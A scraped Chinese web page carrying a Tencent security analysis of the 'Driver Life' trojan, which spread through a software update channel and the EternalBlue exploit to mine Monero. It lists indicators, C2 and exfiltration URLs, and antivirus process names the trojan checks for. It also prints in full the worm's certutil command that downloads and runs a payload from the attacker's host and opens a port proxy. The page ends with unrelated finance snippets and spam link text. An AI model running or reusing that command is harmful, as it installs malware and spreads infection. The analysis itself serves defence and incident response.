<em id="dmtkw"></em>
<label id="dmtkw"><track id="dmtkw"></track></label>

    <progress id="dmtkw"><track id="dmtkw"></track></progress>
  • 門羅幣勒索病毒(“驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣)

    更新時間:2023-06-29 16:24:49

    正文內容

    騰訊安全御見威脅情報中心監測發現,一款通過“驅動人生”升級通道,并同時利用“永恒之藍”高危漏洞傳播的木馬突然爆發,僅2個小時受攻擊用戶就高達10萬?!膀寗尤松蹦抉R會利用高危漏洞在企業內網呈蠕蟲式傳播,并進一步下載云控木馬,在中毒電腦進行門羅幣挖礦。

    一、概述

    12月14日下午,騰訊安全御見威脅情報中心監測發現,一款通過“驅動人生”升級通道,并同時利用“永恒之藍”高危漏洞傳播的木馬突然爆發,僅2個小時受攻擊用戶就高達10萬。

    “驅動人生”木馬會利用高危漏洞在企業內網呈蠕蟲式傳播,并進一步下載云控木馬,在中毒電腦上進行門羅幣挖礦。云控木馬對企業信息安全威脅巨大,企業用戶須重點關注。

    該病毒爆發剛好是周末時間,令企業網管猝不及防,周一工作日員工電腦開機后,建議立刻查殺病毒,再使用殺毒軟件的漏洞修復功能安裝系統補丁。個人電腦用戶使用騰訊電腦管家即可防御。

    本次病毒爆發有三個特點:

    1.驅動人生升級通道傳播的病毒會在中毒電腦安裝云控木馬;

    2.病毒會利用永恒之藍漏洞在局域網內主動擴散;

    3.通過云端控制收集中毒電腦部分信息,接受云端指令在中毒電腦進行門羅幣挖礦。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    木馬攻擊流程圖

    二、詳細分析

    dtlupg.exe訪問以下url下載病毒

    hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

    hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

    (注意,為避免網友點擊以上鏈接可以直接下載病毒程序,對部分字符做了隱藏處理)

    病毒文件釋放在:

    C:Program Files (x86)DTLSoftriliUpdaterctrlff79cb9d2893b254cc75dfb7f3e454a69.exe等位置執行。

    f79cb9d2893b254cc75dfb7f3e454a69.exe 運行后最終釋放出 C:WINDOWSTempsvvhost.exe

    (MD5:2E9710A4B9CBA3CD11E977AF87570E3B)運行,svvhost.exe打包了“永恒之藍”等漏洞攻擊工具在內外網進一步擴散。

    2.1 病毒母體

    F79CB9D2893B254CC75DFB7F3E454A69.exe

    運行后將自身拷貝到C:windowssystem32svhost.exe,安裝為服務并啟動,服務名為Ddiver,并在隨后拉起云控模塊svhhost.exe、攻擊模塊svvhost.exe。

    運行時先檢測互斥體,確定是否已感染過。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    通過檢測以下進程將殺軟信息搜集準備上傳。

    360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    檢測到任務管理器及游戲進程則將云控模塊svhhost.exe退出。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    打開互斥體,對象名稱為"I am tHe xmr reporter" ,xmr意指xmrig.exe礦機。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    搜集系統敏感信息上傳到hxxp://i.haqo.net/i.png,并接受返回的云控代碼等待執行。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    母體設置進程共享內存HSKALWOEDJSLALQEOD

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    2.2 挖礦

    云控木馬svhhost.exe其主要功能是,從母體進程svhost.exe共享內存中讀取shellcode解密并執行,每隔2000秒讀取一次共享內存中的shellcode進行解密執行,共享內存名為HSKALWOEDJSLALQEOD,目前該shellcode主要功能挖礦,不排除后期會拉取其他更加惡意如加密勒索等木馬病毒執行

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    云控木馬執行流程

    云控木馬運行后會創建一個線程,該線程函數主要功能是判斷進程svhost.exe(母體進程)是否存在,不存在的話則啟動該進程,接下來要讀取的共享內存數據就是從該進程進行讀取

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    創建線程判斷母體進程是否存在

    調用OpenFileMappingA打開共享內存,讀取共享內存數據

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    讀取共享內存數據

    調用RtlDecompressBuffer函數解壓共享內存中的數據,為下一步執行做準備

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    解壓共享內存數據

    共享內存數據加壓完后會執行,目前該shellcode主要功能挖礦,不排除后期會拉取其他更加惡意如加密勒索等木馬病毒執行

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    執行shellcode

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    嘗試挖礦時通信IP為172.105.204.237

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    2.3 攻擊模塊

    攻擊模塊從地址hxxp://dl.haqo.net/eb.exez下載,作為子進程Svvhost.Exe啟動,分析發現該文件是通過python實現的“永恒之藍”漏洞利用模塊壓縮打包程序。

    子進程Svvhost.Exe為將python實現的“永恒之藍”漏洞利用模塊壓縮打包程序。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    Mysmb.pyo為攻擊時掃描代碼。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    GitHub上也可以看到相關開源代碼

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    掃描內網445端口進行攻擊

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    不僅攻擊內網漏洞機器,還隨機找幾個外網IP嘗試攻擊,1次攻擊完后沉默20分鐘

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    攻擊成功后paylaod在中招機器執行以下命令進行內網擴散傳播

    cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

    安全建議

    1. 服務器暫時關閉不必要的端口(如135、139、445),方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html

    2. 企業用戶在周一上班后,建議使用騰訊御點查殺病毒(個人用戶可使用騰訊電腦管家),然后使用漏洞修復功能,修復全網終端存在的系統高危漏洞;

    3. 服務器使用高強度密碼,切勿使用弱口令,防止黑客暴力破解;

    4. 使用殺毒軟件攔截可能的病毒攻擊;

    5. 推薦企業用戶部署騰訊御界高級威脅檢測系統防御可能的黑客攻擊。御界高級威脅檢測系統,是基于騰訊反病毒實驗室的安全能力、依托騰訊在云和端的海量數據,研發出的獨特威脅情報和惡意檢測模型系統。

    “驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

    點擊更多評論

    • 證券公司信息官

      每經記者:陳晨 每經編輯:趙云今日(3月17日),安信證券發布消息稱,公開招聘副總經理1名,分管自營證券投資或資產管理業務。根據安信證券
    • 東方財富保險公

      □記者 譚樂之近日,A股5家上市險企(中國人保、中國人壽、中國平安、中國太保、新華保險)2022年三季報均已發布。數據顯示,前三季度,5
    • 寧夏電投鋼鐵有

      圍繞西北地區第一大民營鋼企寧夏申銀特鋼股份有限公司(以下簡稱“申銀特鋼”)的債務問題,新黃浦(600638)董事長仇瑜峰與袁永興、沈水才、楊
    • 歐易哪里看買入

      期權是到期交易的貨品到期之后行權的權益,BTC期權就是交易未來BTC行權之后的權益,分為看漲期權跟看跌期權;看漲期權,到期價格高于買入時BT
    • 有人教你用歐易

      三類最易發揮失常的考生1、得失心太重有好勝心這是很好的,但是好勝心太重就成了高考的大忌。很多同學不管是大考小考都非常在乎,哪怕是跟自
    • 全球投資有限公

      新華社北京4月21日電 題:外資加速進入 中國依然是全球投資熱土新華社記者孟佳、馬欣然、楊曉靜最新數據顯示,2023年一季度全國實際
    • 歐易商家清退多

      繼上周五大跌10%之后,全球最大的虛擬貨幣交易平臺之一火幣,今早開盤又一度暴跌超30%……截至發稿,火幣跌幅收窄至21.3%。年底前
    • 歐易審核多久(歐

      雖然說比特幣在2008年就已經誕生,但是支持者的范圍還是比較狹窄,經過多年的努力被少數人認可,比特幣等加密貨幣的信息也是近幾年才走進我們的生
    文章推薦
    • 合作模式:活動合作、資源互換等

      E-mail:476445525@qq.com

    野花视频中文免费观看3,24小时免费直播在线观看,两个人BD高清日本
    <em id="dmtkw"></em>
    <label id="dmtkw"><track id="dmtkw"></track></label>

    <progress id="dmtkw"><track id="dmtkw"></track></progress>